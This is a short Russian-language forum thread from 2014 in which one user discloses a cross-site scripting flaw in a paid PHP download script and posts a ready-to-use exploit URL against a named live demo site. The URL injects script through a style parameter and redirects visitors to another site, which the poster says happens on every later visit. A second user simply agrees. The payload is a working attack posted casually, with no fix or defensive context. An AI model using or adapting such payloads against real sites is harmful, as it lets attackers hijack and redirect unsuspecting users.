Уязвимость SEA Downoloads

1. VITAMIN (08.12.2014 / 14:28)
Собственно платный движек:
http://wapinet.ru/buy_php_scripts
Пример:
http://sea.wapinet.ru/

Уязвимость:
http://sea.wapinet.ru/?url=somebody.com&style=sea.wapinet.ru/style/style.css"><script>location.href="//visavi.net";</script>

Если хотя бы раз подключить юзера к этому линку,то при переходе на
http://sea.wapinet.ru
его будет бросать на http://visavi.net smile

2. Влад (08.12.2014 / 15:00)
Точняк

URL: https://visavi.net/topics/41673